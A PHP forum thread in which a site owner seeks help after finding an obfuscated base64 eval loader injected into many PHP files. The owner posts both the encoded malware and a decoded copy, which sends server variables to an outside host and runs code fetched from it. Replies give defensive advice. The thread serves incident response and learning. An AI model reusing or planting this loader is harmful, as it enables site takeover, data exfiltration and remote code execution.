how to prevent from base64 attacks ?
Results 1 to 7 of 7

Thread: how to prevent from base64 attacks ?

  1. #1
    Come Whatever you are !
    Join Date
    May 2010
    Location
    38.456 N - 27.115 E
    Posts
    32

    how to prevent from base64 attacks ?

    at one of our sites i found a bad code at the top of index.php, main.php files of nearly all scripts (calendars,gallery scripts, file uploding forms .. etc.)
    i wrote this bad code to the below, and this code was redirecting especially mobile viewers to a porn site.
    I cleaned those codes from about 25 files but i am in doubt whether it comes back again or not.

    Most of our scripts seem to be updated to latest versions, What can i do for better security, we dont want this to happen again.
    what can you offer and what is the reason of that hacking ? please give me info ..

    the code that i cleaned :

    PHP Code:
    <?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwppZighJGhrdWhfYikgeyBnbG9iYWwgJGhrdWhfYjsgJGhrdWhfYiA9IDE7CiRia2xqZz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiRnaGZqdSA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIiwgImJvdCIsICJzcGlkIiwgIkx5bngiLCAiUEhQIiwgIldvcmRQcmVzcyIuICJpbnRlZ3JvbWVkYiIsIlNJU1RSSVgiLCJBZ2dyZWdhdG9yIiwgImZpbmRsaW5rcyIsICJYZW51IiwgIkJhY2tsaW5rQ3Jhd2xlciIsICJTY2hlZHVsZXIiLCAibW9kX3BhZ2VzcGVlZCIsICJJbmRleCIsICJhaG9vIiwgIlRhcGF0YWxrIiwgIlB1YlN1YiIsICJSU1MiKTsKaWYoICEoJF9HRVRbJ2RmJ10gPT09ICIyIikgYW5kICEoJF9QT1NUWydkbCddID09PSAiMiIgKSBhbmQgIShAJF9DT09LSUVbJ3N0YXRzbGUnXSkgYW5kICgocHJlZ19tYXRjaCgiLyIgLiBpbXBsb2RlKCJ8IiwgJGdoZmp1KSAuICIvaSIsICRia2xqZykpIG9yIChAJF9DT09LSUVbJ3N0YXRzbCddKSAgb3IgKCEkYmtsamcpIG9yICgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10gPT09ICJodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgb3IgKCRfU0VSVkVSWydSRU1PVEVfQUREUiddID09PSAiMTI3LjAuMC4xIikgIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gJF9TRVJWRVJbJ1NFUlZFUl9BRERSJ10pIG9yICgkX0dFVFsnZGYnXSA9PT0gIjEiKSBvciAoJF9QT1NUWydkbCddID09PSAiMSIgKSAgb3IgKGluaV9nZXQoInNhZmVfbW9kZSIpKSBvciAoIWZ1bmN0aW9uX2V4aXN0cygnZmlsZV9nZXRfY29udGVudHMnKSkgb3IgKCFmdW5jdGlvbl9leGlzdHMoJ29iX3N0YXJ0JykpKSkKe30KZWxzZQp7CmZvcmVhY2goJF9TRVJWRVIgYXMgJG5kYnYgPT4gJGNiY2QpIHsgJGRhdGFfbmZkaC49ICImUkVNXyIuJG5kYnYuIj0nIi5iYXNlNjRfZW5jb2RlKCRjYmNkKS4iJyI7fQokY29udGV4dF9qaGtiID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKAphcnJheSgnaHR0cCc9PmFycmF5KAogICAgICAgICAgICAgICAgICAgICAgICAndGltZW91dCcgPT4gJzE1JywKICAgICAgICAgICAgICAgICAgICAgICAgJ2hlYWRlcicgPT4gIlVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IExpbnV4IGk2ODY7IHJ2OjEwLjAuOSkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMC4wLjlfIEljZXdlYXNlbC8xMC4wLjlcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIsCiAgICAgICAgICAgICAgICAgICAgICAgICdtZXRob2QnID0+ICdQT1NUJywKICAgICAgICAgICAgICAgICAgICAgICAgJ2NvbnRlbnQnID0+ICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaAopKSk7CiR2a2Z1PWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vZ2FsZXJpYS5iYW5hc3play5pbmZvL3BsdWdpbnMvZmx2cGxheWVyL3Nlc3Npb24ucGhwP2lkIiwgZmFsc2UgLCRjb250ZXh0X2poa2IpOwppZigkdmtmdSkgeyBAZXZhbCgkdmtmdSk7IH0gZWxzZSB7b2Jfc3RhcnQoKTsgIGlmKCFAaGVhZGVyc19zZW50KCkpIHsgQHNldGNvb2tpZSgic3RhdHNsIiwiMiIsdGltZSgpKzE3MjgwMCk7IH0gZWxzZSB7IGVjaG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdzdGF0c2w9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsKfQp9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*68066*/ ?>

  2. #2
    Come Whatever you are !
    Join Date
    May 2010
    Location
    38.456 N - 27.115 E
    Posts
    32
    i decoded the bad code from an online decoding source. it is as follows :
    maybe it helps for answering my questions above better.
    I wonder if there may be any other file at the server that puts this bad code to our php files., if yes how can i find it ?
    the site is a big site.
    Thanks

    decoded codes :
    PHP Code:
    error_reporting(0);
    if(!
    $hkuh_b) { global $hkuh_b$hkuh_b 1;
    $bkljg=$_SERVER["HTTP_USER_AGENT"];
    $ghfju = array("Google""Slurp""MSNBot""ia_archiver""Yandex""Rambler""bot""spid""Lynx""PHP""WordPress""integromedb","SISTRIX","Aggregator""findlinks""Xenu""BacklinkCrawler""Scheduler""mod_pagespeed""Index""ahoo""Tapatalk""PubSub""RSS");
    if( !(
    $_GET['df'] === "2") and !($_POST['dl'] === "2" ) and !(@$_COOKIE['statsle']) and ((preg_match("/" implode("|"$ghfju) . "/i"$bkljg)) or (@$_COOKIE['statsl'])  or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1")  or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1" )  or (ini_get("safe_mode")) or (!function_exists('file_get_contents')) or (!function_exists('ob_start'))))
    {}
    else
    {
    foreach(
    $_SERVER as $ndbv => $cbcd) { $data_nfdh.= "&REM_".$ndbv."='".base64_encode($cbcd)."'";}
    $context_jhkb stream_context_create(
    array(
    'http'=>array(
                            
    'timeout' => '15',
                            
    'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
                            
    'method' => 'POST',
                            
    'content' => "REM_REM='1'".$data_nfdh
    )));
    $vkfu=file_get_contents("http://galeria.banaszek.info/plugins/flvplayer/session.php?id"false ,$context_jhkb);
    if(
    $vkfu) { @eval($vkfu); } else {ob_start();  if(!@headers_sent()) { @setcookie("statsl","2",time()+172800); } else { echo "<script>document.cookie='statsl=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';</script>"; } ;};
    }

    Last edited by ugurpc; 03-08-2013 at 11:47 AM.

  3. #3
    High Energy Magic Dept. NogDog's Avatar
    Join Date
    Aug 2006
    Location
    Ankh-Morpork
    Posts
    13,816
    The fact that it's base64-encoded PHP code has nothing to do with how it got onto your site, that's just the payload the attacker left once they found a way in. They may have hacked your site login or FTP password (so it's probably time to change all passwords to longer, more difficult to hack passwords, and make sure all access to the site's control panel and FTP (or really SFTP) are via SSL). If you're on a shared hosting plan, it may have come through another hacked account on that same host, or even someone who registered an account there so they could access other accounts' directories on a poorly configured host (so you might want to consider upgrading to a VPS plan, or even move to a different host. There may be a security hole in one of your site's pages that allowed them to drop in a script to modify your PHP files (and then perhaps delete itself), which might require a detailed security analysis to find (and make sure all your 3rd-part apps have the latest security patches!).
    Please give us a simple answer, so that we don't have to think, because if we think, we might find answers that don't fit the way we want the world to be." ~ from Nation, by Terry Pratchett

    "But the main reason that any programmer learning any new language thinks the new language is SO much better than the old one is because hes a better programmer now!" ~ http://www.oreillynet.com/ruby/blog/...ck_to_p_1.html


    eBookworm.us

  4. #4
    Pedantic Curmudgeon Weedpacket's Avatar
    Join Date
    Aug 2002
    Location
    General Systems Vehicle "Thrilled To Be Here"
    Posts
    21,771
    The OWASP project provides a lot of material for helping secure web sites, including descriptions of vulnerabilities a site might have and the attacks that exploit them; they also include a 3-yearly assessment of the top ten risks facing current web applications (including a specific section for PHP.
    THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER
    FAQs! FAQs! FAQs! Most forums have them!
    Search - Debugging 101 - Collected Solutions - General Guidelines - Getting help at all

  5. #5
    Senior Member Derokorian's Avatar
    Join Date
    Apr 2011
    Location
    Denver
    Posts
    1,740
    Hey weed, thanks for the links. I've not seen this site before and it shall give me some reading to do.
    Sadly, nobody codes for anyone on this forum. People taste your dishes and tell you what is missing, but they don't cook for you. ~anoopmail
    I'd rather be a comma, then a full stop.
    User Authentication in PHP with MySQLi - Don't forget to mark threads resolved - MySQL(i) warning

  6. #6
    Come Whatever you are !
    Join Date
    May 2010
    Location
    38.456 N - 27.115 E
    Posts
    32
    Thank you for answers and the valuable info you posted. nogdog and weedpacket

  7. #7
    Pedantic Curmudgeon Weedpacket's Avatar
    Join Date
    Aug 2002
    Location
    General Systems Vehicle "Thrilled To Be Here"
    Posts
    21,771
    Quote Originally Posted by ugurpc
    i decoded the bad code from an online decoding source. it is as follows :
    Incidentally there was no need to go to an "online decoding source" to decode the base64. The decoding mechanism is built right into PHP and was used by what you posted: base64_decode.
    THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER
    FAQs! FAQs! FAQs! Most forums have them!
    Search - Debugging 101 - Collected Solutions - General Guidelines - Getting help at all

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •